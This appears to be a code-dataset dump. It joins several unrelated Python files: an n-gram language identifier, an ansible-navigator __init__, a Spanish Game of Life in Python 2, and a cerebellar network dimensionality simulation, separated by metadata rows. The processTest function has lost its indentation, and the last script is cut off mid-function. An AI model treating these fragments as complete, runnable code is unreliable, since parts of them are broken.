0.46977617561176277, 0.38169314268455723, 0.0, 0.0, 0.0, 0.0, 0.0, 0.029361010975735173, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'th'], [0.0, 0.009787589618983562, 0.0, 0.014681384428475342, 0.0, 0.0, 0.0, 0.0, 0.014681384428475342, 0.0, 0.0, 0.014681384428475342, 0.0, 0.0, 0.0, 0.019575179237967123, 0.0, 0.2789463041410315, 0.0, 0.0, 0.0, 0.0, 0.014681384428475342, 0.004893794809491781, 0.2300083560461137, 0.0, 0.0, 0.0, 0.5040608653776534, 0.0, 0.0, 0.004893794809491781, 0.3768222003308671, 0.0, 0.009787589618983562, 0.0, 0.0, 0.009787589618983562, 0.0, 0.0, 0.0, 0.401291174378326, 0.0, 0.0, 0.009787589618983562, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3866097899498507, 0.0, 0.401291174378326, 0.0, 0.0, 0.0, 'uk'], [0.0, 0.0, 0.0, 0.1102434659256059, 0.0, 0.0, 0.0, 0.0, 0.0881947727404847, 0.0, 0.0, 0.06614607955536353, 0.0, 0.0, 0.0, 0.04409738637024235, 0.0, 0.0, 0.0, 0.0, 0.0, 0.13229215911072706, 0.0, 0.022048693185121176, 0.0, 0.0, 0.0, 0.6394121023685142, 0.0, 0.0881947727404847, 0.0, 0.04409738637024235, 0.0, 0.1984382386660906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.7055581819238776, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'zh'], [0.0, 0.009472398570543173, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4641475299566155, 0.45467513138607235, 0.009472398570543173, 0.009472398570543173, 0.0, 0.0, 0.0, 0.0, 0.0, 0.009472398570543173, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3504787471100974, 0.0, 0.0, 0.0, 0.0, 0.5778163128031336, 0.0, 0.0, 0.0, 0.10419638427597491, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3315339499690111, 0.0, 0.0, 'he']]
Ngram_set = {'ว', 'и', 'ा', '?', '다', 'а', 'a', 'ה', 'de', '!', 'ي', 'י', 'र', '는', 'я', 'е', 'ه', 'ی', 'en', 'ת', 'e', 'ㅋㅋ', 'ी', '…', 'แล้ว', 'ר', 'о', 'ם', 'n', 'на', 'की', 'і', 'o', 'RT', '。', 'میں', 'े', 'ن', 'i', 'w', 'ے', 's', 'ๆ', 'di', 'ا', 'T', 'd', 'को', 't', 'م', 'た', 'त', 'ो', 'ㅋ', 'ะ', 'کے', 'و', 'r'}
test = '你好'
N = 4
K = 5
header = ['م', 'ם', 'ी', 'た', 'ㅋ', 'd', 's', 'di', 'र', 'त', 'ا', 'ה', 'о', 't', 'ن', 'ा', 'ㅋㅋ', 'ว', 'की', 'י', 'w', '!', '…', 'en', 'े', 'ๆ', 'і', '?', 'ے', 'и', 'а', 'کے', '다', '는', 'T', 'ي', 'e', 'میں', 'r', 'ی', 'แล้ว', 'o', 'на', 'को', 'ר', 'RT', '。', 'و', 'ो', 'ะ', 'ه', 'е', 'i', 'я', 'n', 'a', 'de', 'ת', 'lang']
def count_Ngrams(document, N):
    """Returns the list of distinct character N-grams in the tokenized
    document; words shorter than N characters are kept whole."""
    Ngrams = []
    for word in document:
        if len(word) < N:
            if word not in Ngrams:
                Ngrams.append(word)
        else:
            # A word of length L yields L - N + 1 overlapping N-grams
            for i in range(0, len(word) - N + 1):
                Ngram = word[i:i+N]
                if Ngram not in Ngrams:
                    Ngrams.append(Ngram)
    return Ngrams
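As a quick illustration of the extraction above, here is a self-contained Python 3 sketch (the file itself uses Python 2 print syntax; the name `char_ngrams` is illustrative, not part of this module) showing that words shorter than N are kept whole while longer words yield overlapping N-grams:

```python
def char_ngrams(tokens, n):
    # Distinct character n-grams over a pre-tokenized document;
    # tokens shorter than n are kept whole, as in count_Ngrams above.
    grams = []
    for word in tokens:
        if len(word) < n:
            if word not in grams:
                grams.append(word)
        else:
            for i in range(len(word) - n + 1):
                g = word[i:i + n]
                if g not in grams:
                    grams.append(g)
    return grams

print(char_ngrams(["hello", "de"], 4))  # ['hell', 'ello', 'de']
```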
def createVector(Ngrams):
    """Builds the N-gram frequency vector in the column order of header."""
    Ngramcount = {}
    for h in header[:-1]:
        Ngramcount[h] = 0
    for gram in Ngrams:
        if gram in Ngramcount:
            Ngramcount[gram] += 1
    vector = []
    for h in header[:-1]:
        vector.append(Ngramcount[h])
    return vector
def computerScores(train_data, vector):
    """Scores the test vector against every language row (dot product of
    weights and frequencies) and returns (score, language) pairs,
    highest score first."""
    scores = []
    for lang in train_data:
        score = 0
        for i in range(len(lang) - 1):
            score += lang[i] * vector[i]
        scores.append((score, lang[-1]))
    return sorted(scores, reverse=True)
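The scoring step above is a plain dot product between each language's weight row and the test frequency vector; a minimal Python 3 sketch with hypothetical two-feature rows:

```python
def compute_scores(train_rows, vector):
    # Each row is [w0, ..., wk, label]; score = dot(weights, vector).
    scores = []
    for row in train_rows:
        weights, label = row[:-1], row[-1]
        score = sum(w * v for w, v in zip(weights, vector))
        scores.append((score, label))
    return sorted(scores, reverse=True)

rows = [[0.5, 0.0, 'en'], [0.0, 0.9, 'es']]
print(compute_scores(rows, [2, 1]))  # [(1.0, 'en'), (0.9, 'es')]
```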
def processTest(test):
#tokenize test data
test = test.split()
    # clean the test data: drop mentions, hashtags and URLs; strip punctuation and digits
buffer = []
for i in test:
if ('@' not in i) and ('#' not in i) and ('http' not in i):
i = re.sub('[%s]' % re.escape(string.punctuation),'',i)
i = re.sub('\d','',i)
if i != '':
buffer.append(i)
test = buffer
#create Ngrams
Ngrams = count_Ngrams(test, N)
#create vector for test
vector = createVector(Ngrams)
#compute scores for each language
scores = computerScores(train_data, vector)
return scores
#######################################
scores = processTest(test)
for i in scores:
print(i)
| 146.377551 | 11,597 | 0.632276 | 2,845 | 14,345 | 3.191916 | 0.145518 | 0.386742 | 0.494219 | 0.544874 | 0.371325 | 0.326176 | 0.324083 | 0.24744 | 0.244797 | 0.204383 | 0 | 0.633969 | 0.145068 | 14,345 | 97 | 11,598 | 147.886598 | 0.10486 | 0.01443 | 0 | 0.073529 | 0 | 0 | 0.014556 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.058824 | 0 | 0.176471 | 0.014706 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
75f86a4e5d466bd834b97c18cf1681d258094a13 | 254 | py | Python | src/ansible_navigator/configuration_subsystem/__init__.py | ssbarnea/ansible-navigator | 50bc35a6b52e834d19450e1f6acf2394a838fb73 | [
"Apache-2.0"
] | null | null | null | src/ansible_navigator/configuration_subsystem/__init__.py | ssbarnea/ansible-navigator | 50bc35a6b52e834d19450e1f6acf2394a838fb73 | [
"Apache-2.0"
] | null | null | null | src/ansible_navigator/configuration_subsystem/__init__.py | ssbarnea/ansible-navigator | 50bc35a6b52e834d19450e1f6acf2394a838fb73 | [
"Apache-2.0"
] | null | null | null | """configuration subsystem
"""
from .configurator import Configurator
from .definitions import ApplicationConfiguration
from .definitions import Constants
from .definitions import SettingsEntry
from .navigator_configuration import NavigatorConfiguration
| 31.75 | 59 | 0.866142 | 23 | 254 | 9.521739 | 0.478261 | 0.205479 | 0.287671 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090551 | 254 | 7 | 60 | 36.285714 | 0.948052 | 0.090551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f9c22039404f2835280536edd02ee915bf004f45 | 7,794 | py | Python | olimpiada/ejercicios/olimpiada I/life_game.py | DarkShadow4/python | 4cd94e0cf53ee06c9c31e9272572ca9656697c30 | [
"MIT"
] | null | null | null | olimpiada/ejercicios/olimpiada I/life_game.py | DarkShadow4/python | 4cd94e0cf53ee06c9c31e9272572ca9656697c30 | [
"MIT"
] | null | null | null | olimpiada/ejercicios/olimpiada I/life_game.py | DarkShadow4/python | 4cd94e0cf53ee06c9c31e9272572ca9656697c30 | [
"MIT"
] | 1 | 2020-08-19T17:25:22.000Z | 2020-08-19T17:25:22.000Z | celda = {
"viva": "#",
"vacia": "-"
}
def generar_tablero():
    """Generates an empty board of n rows by m columns."""
    n = int(raw_input("enter the number of rows: "))
    m = int(raw_input("enter the number of columns: "))
    tablero = []
    for i in range(n):
        fila = []
        for j in range(m):
            fila.append(celda["vacia"])
        tablero.append(fila)
    return tablero, n, m
def mostrar_tablero(tablero):
    """Prints the board, one row per line."""
    for fila in tablero:
        for c in fila:
            print c,
        print ""
def dar_vida(tablero):
    """Places live cells on the board; a coordinate of 0 or less ends input."""
    x, y = 0, 0
    while y >= 0 and x >= 0:
        y, x = raw_input("enter coordinates (row col): ").split()
        y = int(y) - 1
        x = int(x) - 1
        if y >= len(tablero) or x >= len(tablero[0]):
            print "invalid coordinate"
        else:
            if y >= 0 and x >= 0:
                tablero[y][x] = celda["viva"]
def comprobar_vecindario(tablero, y, x, vecinas_para_sobrevivir, vecinas_para_nacer):
    """Counts the live cells among the up-to-8 in-bounds neighbours of
    (y, x) and updates the cell in place according to the rules.

    Note: because the board is updated in place, cells already processed
    in this generation influence the counts of later ones."""
    merece_vivir = False
    cv = 0
    for dy in (-1, 0, 1):
        for dx in (-1, 0, 1):
            if dy == 0 and dx == 0:
                continue
            ny = y + dy
            nx = x + dx
            if 0 <= ny < len(tablero) and 0 <= nx < len(tablero[ny]):
                if tablero[ny][nx] == celda["viva"]:
                    cv += 1
    # Show the cell being evaluated and its neighbour count
    cell = tablero[y][x]
    tablero[y][x] = "·"
    mostrar_tablero(tablero)
    tablero[y][x] = cell
    print cv
    if tablero[y][x] == celda["viva"]:
        print "vecinas_para_sobrevivir:", vecinas_para_sobrevivir
        if cv in vecinas_para_sobrevivir:
            merece_vivir = True
        if not merece_vivir:
            tablero[y][x] = celda["vacia"]
    else:
        print "vecinas_para_nacer:", vecinas_para_nacer
        if cv in vecinas_para_nacer:
            merece_vivir = True
        if merece_vivir:
            tablero[y][x] = celda["viva"]
def simular_evolucion(n_generaciones, tablero, vecinas_para_sobrevivir, vecinas_para_nacer):
    """Runs the simulation. Note: cells are updated in place, so each cell
    already sees the updated state of the cells processed before it."""
    for i in range(n_generaciones):
        print "generacion", i + 1
        y = 0
        for fila in tablero:
            x = 0
            for _ in fila:
                comprobar_vecindario(tablero, y, x, vecinas_para_sobrevivir, vecinas_para_nacer)
                x += 1
            y += 1
        mostrar_tablero(tablero)

tablero, n, m = generar_tablero()
dar_vida(tablero)
mostrar_tablero(tablero)
vecinas_para_sobrevivir = []
for x in raw_input("Number of neighbouring cells needed to survive: ").split():
    if int(x) not in vecinas_para_sobrevivir:
        vecinas_para_sobrevivir.append(int(x))
vecinas_para_nacer = []
for x in raw_input("Number of neighbouring cells needed to be born: ").split():
    if int(x) not in vecinas_para_nacer:
        vecinas_para_nacer.append(int(x))
n_generaciones = int(raw_input("Enter the number of generations to simulate: "))
simular_evolucion(n_generaciones, tablero, vecinas_para_sobrevivir, vecinas_para_nacer)
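# Illustrative, self-contained sketch (a hypothetical helper, not called by
# the program above): counting live neighbours on a plain 0/1 board with
# hard, non-wrapping edges. The game itself stores characters from the
# global `celda` dict and wraps the top/left edges via negative indexing,
# so this is a simplified variant of what comprobar_vecindario computes.
def _contar_vecinas_demo(tablero01, y, x):
    cv = 0
    for dy in (-1, 0, 1):
        for dx in (-1, 0, 1):
            if dy == 0 and dx == 0:
                continue  # skip the cell itself
            ny, nx = y + dy, x + dx
            if 0 <= ny < len(tablero01) and 0 <= nx < len(tablero01[0]):
                cv += tablero01[ny][nx]
    return cv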
# === analysis/dimensionalty_sim/run_tests_210327.py (repo: htem/cb2_project_analysis, license: MIT) ===
import random
import copy
import logging
import sys
from collections import defaultdict
import itertools
from sim_lite import SimulationLite
import compress_pickle
sys.path.insert(0, '/n/groups/htem/Segmentation/shared-nondev/cb2_segmentation/analysis_mf_grc')
from neurons import GranuleCell, MossyFiber, Simulation, generate_binary_patterns, add_noise_binary_patterns, add_noise_to_core_patterns
import analysis
# logging.basicConfig(level=logging.DEBUG)
def test_similarity_by_activation_level3(
        input_graph,
        noise_prob=None,
        activation_levels=None,
        seed=0,
        print_output=False,
        test_len=128,
        sim=None,
        ):
    random.seed(seed)
    if sim is None:
        input_graph = copy.deepcopy(input_graph)
        removed = input_graph.remove_empty_mfs()
        sim = Simulation(
            input_graph=input_graph,
            )
    n_pattern = 1024*4  # 309
    patterns = sim.generate_patterns(
        count=n_pattern,
        # type='gaussian',
        )
    sim.set_failure_rate(0, seed=seed)
    all_res = {}
    for calibrate_activation_level in activation_levels:
        print(f'calibrate_activation_level: {calibrate_activation_level}')
        sim.evaluate(patterns, no_random=True,
                     calibrate_activation_level=calibrate_activation_level)
        ref_pattern = patterns[0]
        sim.evaluate([ref_pattern], no_random=True)
        ref_output = sim.get_grc_activities()[0]
        redundant_patterns = sim.add_noise_patterns([ref_pattern], prob=noise_prob, n=test_len)
        sim.evaluate(redundant_patterns, no_random=True)
        acts = sim.get_grc_activities()
        voi = analysis.get_average_metric2(acts, ref_output, metric='voi')
        binary_similarity = analysis.get_average_metric2(acts, ref_output, metric='binary_similarity')
        hamming_distance = analysis.get_average_hamming_distance2(acts, ref_output)
        normalized_mse = analysis.get_normalized_mean_squared_distance(
            hamming_distance/len(acts), f=calibrate_activation_level)
        mf_dim, mf_pop_corr = analysis.get_dim_from_acts(sim.get_mfs_activities(), ret_population_correlation=True)
        grc_dim, grc_pop_corr = analysis.get_dim_from_acts(sim.get_grc_activities(), ret_population_correlation=True)
        pct_grc = int(grc_dim*1000/sim.num_grcs)/10
        pct_mfs = int(grc_dim*1000/sim.num_mfs)/10
        pct_mf_dim = int(grc_dim*1000/mf_dim)/10
        if print_output:
            print(f'grc_pop_corr: {grc_pop_corr}')
            print(f'mf_pop_corr: {mf_pop_corr}')
            print(f'Dim MFs: {mf_dim}')
            print(f'Dim GRCs: {grc_dim}')
            print(f' = {pct_mfs}% of MFs')
            print(f' = {pct_mf_dim}% of MF dim')
            print(f' = {pct_grc}% of GrCs')
        res = {}
        res['voi'] = voi
        res['binary_similarity'] = binary_similarity
        res['hamming_distance'] = hamming_distance
        res['normalized_mse'] = normalized_mse
        res['grc_pop_corr'] = grc_pop_corr
        res['mf_dim'] = mf_dim
        res['mf_pop_corr'] = mf_pop_corr
        res['grc_dim'] = grc_dim
        res['pct_grc'] = pct_grc
        res['pct_mfs'] = pct_mfs
        res['pct_mf_dim'] = pct_mf_dim
        res['num_grcs'] = sim.num_grcs
        res['num_mfs'] = sim.num_mfs
        all_res[calibrate_activation_level] = res
    return all_res
def test_similarity_by_activation_level2(
        input_graph,
        noise_prob=None,
        activation_levels=None,
        seed=0,
        print_output=False,
        test_len=128,
        ):
    input_graph = copy.deepcopy(input_graph)
    removed = input_graph.remove_empty_mfs()
    random.seed(seed)
    sim = Simulation(
        input_graph=input_graph,
        )
    n_pattern = 1024*4  # 309
    patterns = sim.generate_patterns(
        count=n_pattern,
        # type='gaussian',
        )
    all_res = {}
    for calibrate_activation_level in activation_levels:
        print(f'calibrate_activation_level: {calibrate_activation_level}')
        sim.evaluate(patterns, no_random=True,
                     calibrate_activation_level=calibrate_activation_level)
        ref_pattern = patterns[0]
        sim.evaluate([ref_pattern], no_random=True)
        ref_output = sim.get_grc_activities()
        redundant_patterns = sim.add_noise_patterns([ref_pattern], prob=noise_prob, n=test_len)
        sim.evaluate(redundant_patterns, no_random=True)
        acts = sim.get_grc_activities()
        voi = analysis.get_average_metric(acts, ref_output, metric='voi')
        binary_similarity = analysis.get_average_metric(acts, ref_output, metric='binary_similarity')
        hamming_distance = analysis.get_average_hamming_distance(acts, ref_output)
        normalized_mse = analysis.get_normalized_mean_squared_distance(
            hamming_distance/len(acts), f=calibrate_activation_level)
        mf_dim, mf_pop_corr = analysis.get_dim_from_acts(sim.get_mfs_activities(), ret_population_correlation=True)
        grc_dim, grc_pop_corr = analysis.get_dim_from_acts(sim.get_grc_activities(), ret_population_correlation=True)
        pct_grc = int(grc_dim*1000/sim.num_grcs)/10
        pct_mfs = int(grc_dim*1000/sim.num_mfs)/10
        pct_mf_dim = int(grc_dim*1000/mf_dim)/10
        if print_output:
            print(f'grc_pop_corr: {grc_pop_corr}')
            print(f'mf_pop_corr: {mf_pop_corr}')
            print(f'Dim MFs: {mf_dim}')
            print(f'Dim GRCs: {grc_dim}')
            print(f' = {pct_mfs}% of MFs')
            print(f' = {pct_mf_dim}% of MF dim')
            print(f' = {pct_grc}% of GrCs')
        res = {}
        res['voi'] = voi
        res['binary_similarity'] = binary_similarity
        res['hamming_distance'] = hamming_distance
        res['normalized_mse'] = normalized_mse
        res['grc_pop_corr'] = grc_pop_corr
        res['mf_dim'] = mf_dim
        res['mf_pop_corr'] = mf_pop_corr
        res['grc_dim'] = grc_dim
        res['pct_grc'] = pct_grc
        res['pct_mfs'] = pct_mfs
        res['pct_mf_dim'] = pct_mf_dim
        res['num_grcs'] = sim.num_grcs
        res['num_mfs'] = sim.num_mfs
        all_res[calibrate_activation_level] = res
    return all_res
def test_similarity_by_noise(
        input_graph,
        noise_probs=None,
        activation_level=None,
        seed=0,
        print_output=False,
        test_len=128,
        ):
    input_graph = copy.deepcopy(input_graph)
    removed = input_graph.remove_empty_mfs()
    random.seed(seed)
    sim = Simulation(
        input_graph=input_graph,
        )
    n_pattern = 1024*4  # 309
    patterns = sim.generate_patterns(
        count=n_pattern,
        # type='gaussian',
        )
    if noise_probs is None:
        noise_probs = range(5, 100, 5)
    all_res = {}
    print(f'activation_level: {activation_level}')
    sim.evaluate(patterns, no_random=True,
                 calibrate_activation_level=activation_level)
    ref_pattern = patterns[0]
    sim.evaluate([ref_pattern], no_random=True)
    ref_output = sim.get_grc_activities()
    for noise_prob in noise_probs:
        print(noise_prob)
        redundant_patterns = sim.add_noise_patterns([ref_pattern], prob=noise_prob, n=test_len)
        sim.evaluate(redundant_patterns, no_random=True)
        acts = sim.get_grc_activities()
        voi = analysis.get_average_metric(acts, ref_output, metric='voi')
        binary_similarity = analysis.get_average_metric(acts, ref_output, metric='binary_similarity')
        hamming_distance = analysis.get_average_hamming_distance(acts, ref_output)
        normalized_mse = analysis.get_normalized_mean_squared_distance(
            hamming_distance/len(acts), f=activation_level)
        mf_dim, mf_pop_corr = analysis.get_dim_from_acts(sim.get_mfs_activities(), ret_population_correlation=True)
        grc_dim, grc_pop_corr = analysis.get_dim_from_acts(sim.get_grc_activities(), ret_population_correlation=True)
        pct_grc = int(grc_dim*1000/sim.num_grcs)/10
        pct_mfs = int(grc_dim*1000/sim.num_mfs)/10
        pct_mf_dim = int(grc_dim*1000/mf_dim)/10
        if print_output:
            print(f'grc_pop_corr: {grc_pop_corr}')
            print(f'mf_pop_corr: {mf_pop_corr}')
            print(f'Dim MFs: {mf_dim}')
            print(f'Dim GRCs: {grc_dim}')
            print(f' = {pct_mfs}% of MFs')
            print(f' = {pct_mf_dim}% of MF dim')
            print(f' = {pct_grc}% of GrCs')
        res = {}
        res['voi'] = voi
        res['binary_similarity'] = binary_similarity
        res['hamming_distance'] = hamming_distance
        res['normalized_mse'] = normalized_mse
        res['grc_pop_corr'] = grc_pop_corr
        res['mf_dim'] = mf_dim
        res['mf_pop_corr'] = mf_pop_corr
        res['grc_dim'] = grc_dim
        res['pct_grc'] = pct_grc
        res['pct_mfs'] = pct_mfs
        res['pct_mf_dim'] = pct_mf_dim
        res['num_grcs'] = sim.num_grcs
        res['num_mfs'] = sim.num_mfs
        all_res[noise_prob] = res
    return all_res
def add_random_failures(acts, failure_rate):
    indices = [k for k in range(len(acts[0]))]
    random.shuffle(indices)
    fail_idx = indices[0:int(failure_rate*len(indices))]
    failed_acts = copy.deepcopy(acts)
    for a in failed_acts:
        for i in fail_idx:
            a[i] = 0
    return failed_acts
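# Self-contained sketch of the failure model above (illustrative helper,
# not used elsewhere; seeded locally so it does not disturb the module-level
# random state): a fixed random subset of unit indices is silenced, and the
# same units are silenced in every pattern.
def _demo_random_failures(acts, failure_rate, seed=0):
    import random
    rng = random.Random(seed)
    indices = list(range(len(acts[0])))
    rng.shuffle(indices)
    fail_idx = set(indices[:int(failure_rate * len(indices))])
    return [[0 if i in fail_idx else v for i, v in enumerate(a)] for a in acts]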
def test_stability_of_core_inputs_across_noise(
        input_graph,
        activation_level,
        noise_probs,
        # failure_rates,
        seed=0,
        test_len=512,
        core_noise=True,
        print_output=True,
        scaled_noise=False,
        sim=None,
        ):
    random.seed(seed)
    if sim is None:
        input_graph = copy.deepcopy(input_graph)
        removed = input_graph.remove_empty_mfs()
        sim = Simulation(
            input_graph=input_graph,
            )
    n_pattern = 1024*4  # 309
    patterns = sim.generate_patterns(count=n_pattern)
    sim.set_failure_rate(0, seed=seed)
    sim.evaluate(patterns, no_random=True,
                 calibrate_activation_level=activation_level)
    test_patterns = [patterns[0]]
    all_res = {}
    for noise in noise_probs:
        print(f'noise={noise}')
        if core_noise:
            redundant_patterns = add_noise_to_core_patterns(test_patterns, prob=noise, n=test_len, seed=seed)
        else:
            redundant_patterns = sim.add_noise_patterns(test_patterns, prob=noise, n=test_len, seed=seed, scaled_noise=scaled_noise)
        ref_pattern = patterns[0]
        sim.evaluate([ref_pattern], no_random=True)
        ref_output = copy.deepcopy(sim.get_grc_activities()[0])
        sim.evaluate(redundant_patterns, no_random=True)
        mf_acts = sim.get_mfs_activities()
        mf_dim, mf_pop_corr = analysis.get_dim_from_acts(mf_acts, ret_population_correlation=True)
        grc_acts = sim.get_grc_activities()
        voi = analysis.get_average_metric2(grc_acts, ref_output, metric='voi')
        binary_similarity = analysis.get_average_metric2(grc_acts, ref_output, metric='binary_similarity')
        hamming_distance = analysis.get_average_hamming_distance2(grc_acts, ref_output)
        normalized_mse = analysis.get_normalized_mean_squared_distance(
            hamming_distance/len(grc_acts), f=activation_level)
        grc_dim, grc_pop_corr = analysis.get_dim_from_acts(grc_acts, ret_population_correlation=True)
        pct_grc = int(grc_dim*1000/sim.num_grcs)/10
        pct_mfs = int(grc_dim*1000/sim.num_mfs)/10
        pct_mf_dim = int(grc_dim*1000/mf_dim)/10
        if print_output:
            print(f'grc_pop_corr: {grc_pop_corr}')
            print(f'mf_pop_corr: {mf_pop_corr}')
            print(f'Dim MFs: {mf_dim}')
            print(f'Dim GRCs: {grc_dim}')
            print(f' = {pct_mfs}% of MFs')
            print(f' = {pct_mf_dim}% of MF dim')
            print(f' = {pct_grc}% of GrCs')
        res = {}
        res['voi'] = voi
        res['binary_similarity'] = binary_similarity
        res['hamming_distance'] = hamming_distance
        res['normalized_mse'] = normalized_mse
        res['grc_pop_corr'] = grc_pop_corr
        res['mf_dim'] = mf_dim
        res['mf_pop_corr'] = mf_pop_corr
        res['grc_dim'] = grc_dim
        res['pct_grc'] = pct_grc
        res['pct_mfs'] = pct_mfs
        res['pct_mf_dim'] = pct_mf_dim
        res['num_grcs'] = sim.num_grcs
        res['num_mfs'] = sim.num_mfs
        all_res[noise] = res
    return all_res
def test_dim_similar_input_with_failure(
        input_graph,
        activation_level,
        noise_probs,
        failure_rates,
        seed=0,
        ):
    removed = input_graph.remove_empty_mfs()
    print(f'Removed {len(removed)} mfs')
    random.seed(seed)
    sim = Simulation(
        input_graph=input_graph,
        )
    n_pattern = 1024*4  # 309
    patterns = sim.generate_patterns(count=n_pattern)
    sim.evaluate(patterns, no_random=True,
                 calibrate_activation_level=activation_level)
    test_patterns = [patterns[0]]
    for noise in noise_probs:
        print(f'noise={noise}')
        redundant_patterns = sim.add_noise_patterns(test_patterns, prob=noise, n=512)
        sim.evaluate(redundant_patterns, no_random=True)
        acts = sim.get_mfs_activities()
        mf_dim = analysis.get_dim_from_acts(acts)
        print(f'Dim MFs: {mf_dim}')
        grc_acts = sim.get_grc_activities()
        grc_dim = analysis.get_dim_from_acts(grc_acts)
        print(f'Dim GRCs: {grc_dim}')
        pct_grc = int(grc_dim*1000/sim.num_grcs)/10
        pct_mfs = int(grc_dim*1000/sim.num_mfs)/10
        pct_mf_dim = int(grc_dim*1000/mf_dim)/10
        print(f' = {pct_mfs}% of MFs')
        print(f' = {pct_mf_dim}% of MF dim')
        print(f' = {pct_grc}% of GrCs')
        for failure_rate in failure_rates:
            print(f'unreliability={failure_rate}')
            grc_acts1 = add_random_failures(grc_acts, failure_rate)
            grc_dim1 = analysis.get_dim_from_acts(grc_acts1)
            print(f' = {grc_dim1:.2f}, {grc_dim1/grc_dim*100:.2f}% of original dimensionality')
def measure_hamming_similarity(vec0, vec1):
    s = 0
    for i, j in zip(vec0, vec1):
        if i == j:
            s += 1
    return s / len(vec0)
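# Self-contained restatement of the measure above (illustrative only): the
# fraction of positions at which two equal-length vectors agree, e.g.
# vectors agreeing in 3 of 4 positions score 0.75.
def _demo_hamming_similarity(vec0, vec1):
    return sum(1 for i, j in zip(vec0, vec1) if i == j) / float(len(vec0))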
def random_combination(iterable, r):
    """Random selection from itertools.combinations(iterable, r)."""
    pool = tuple(iterable)
    n = len(pool)
    indices = sorted(random.sample(range(n), r))
    return tuple(pool[i] for i in indices)
import scipy
import scipy.stats
def measure_correlation_by_sharing(
        input_graph, act_patterns, save_fname=None):
    simlite_graph = SimulationLite(input_graph)
    pos = 0
    grcs_claws = []
    mf_to_grcs = defaultdict(set)
    for grc_id, dendrite_count in enumerate(simlite_graph.dendrite_counts):
        claws = []
        for j in range(dendrite_count):
            mf_id = simlite_graph.dendrite_mf_map[pos]
            pos += 1
            claws.append(mf_id)
            mf_to_grcs[mf_id].add(grc_id)
        grcs_claws.append(set(claws))
    # Count, for each pair of GrCs, how many MFs they share.
    nshares = defaultdict(int)
    nshare_pairs = defaultdict(list)
    counted = set()
    for mf_id, grcs in mf_to_grcs.items():
        for pair in itertools.combinations(grcs, 2):
            if pair in counted:
                continue
            nshare = len(grcs_claws[pair[0]] & grcs_claws[pair[1]])
            nshares[nshare] += 1
            if nshare > 0:
                nshare_pairs[nshare].append(pair)
            counted.add(pair)
            counted.add((pair[1], pair[0]))
    for n in sorted(nshares.keys()):
        print(f'{n}: {nshares[n]/len(simlite_graph.dendrite_counts)}')
    nshare_raw_data_similarity = defaultdict(list)
    nshare_raw_data_corr = defaultdict(list)
    # Baseline: randomly sampled pairs that share no MF.
    n_samples = len(grcs_claws)*10
    combinations = itertools.combinations(range(len(grcs_claws)), 2)
    sim_hist = defaultdict(int)
    for pair in random_combination(combinations, n_samples):
        nshare = len(grcs_claws[pair[0]] & grcs_claws[pair[1]])
        if nshare == 0:
            vec0 = act_patterns[:, pair[0]]
            vec1 = act_patterns[:, pair[1]]
            similarity = measure_hamming_similarity(vec0, vec1)
            corr = scipy.stats.spearmanr(vec0, vec1)[0]
            nshare_raw_data_similarity[nshare].append(similarity)
            nshare_raw_data_corr[nshare].append(corr)
            sim_hist[int(similarity*100)] += 1
    for n in sorted(sim_hist.keys()):
        print(f'{n} {sim_hist[n]}')
    print()
    for nshare in [1, 2, 3]:
        print(f'measuring {nshare}-share, {nshares[nshare]} pairs')
        sim_hist = defaultdict(int)
        for pair in nshare_pairs[nshare]:
            vec0 = act_patterns[:, pair[0]]
            vec1 = act_patterns[:, pair[1]]
            similarity = measure_hamming_similarity(vec0, vec1)
            nshare_raw_data_similarity[nshare].append(similarity)
            corr = scipy.stats.spearmanr(vec0, vec1)[0]
            nshare_raw_data_corr[nshare].append(corr)
            sim_hist[int(similarity*100)] += 1
        for n in sorted(sim_hist.keys()):
            print(f'{n} {sim_hist[n]}')
        print()
    if save_fname:
        nshare_raw_data_similarity = dict(nshare_raw_data_similarity)
        print(f'Saving to {save_fname}')
        compress_pickle.dump(
            (nshare_raw_data_similarity, nshare_raw_data_corr),
            save_fname)
def test_dim_similar_input_and_correlation_by_sharing(
        input_graph,
        noise_probs,
        activation_level=.3,
        seed=0,
        save_fname=None,
        ):
    removed = input_graph.remove_empty_mfs()
    print(f'Removed {len(removed)} mfs')
    random.seed(seed)
    sim = Simulation(
        input_graph=input_graph,
        )
    n_pattern = 1024*4  # 309
    patterns = sim.generate_patterns(count=n_pattern)
    sim.evaluate(patterns, no_random=True,
                 calibrate_activation_level=activation_level)
    test_patterns = [patterns[0]]
    for noise in noise_probs:
        print(f'noise={noise}')
        redundant_patterns = sim.add_noise_patterns(test_patterns, prob=noise, n=512)
        sim.evaluate(redundant_patterns, no_random=True)
        acts = sim.get_mfs_activities()
        mf_dim = analysis.get_dim_from_acts(acts)
        print(f'Dim MFs: {mf_dim}')
        acts = sim.get_grc_activities()
        dim = analysis.get_dim_from_acts(acts)
        print(f'Dim GRCs: {dim}')
        pct_grc = int(dim*1000/sim.num_grcs)/10
        pct_mfs = int(dim*1000/sim.num_mfs)/10
        pct_mf_dim = int(dim*1000/mf_dim)/10
